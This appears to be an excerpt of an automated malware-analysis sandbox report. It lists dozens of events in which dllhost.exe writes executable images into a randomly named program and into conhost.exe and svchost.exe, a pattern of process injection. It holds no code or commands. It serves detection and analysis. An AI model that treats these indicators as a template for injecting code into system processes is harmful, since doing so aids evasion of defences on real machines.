Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 26CDA140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: EC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 12B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 670000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 5A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 10E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 12A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: EC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 115765F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17E36BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000 value starts with: 4D5A
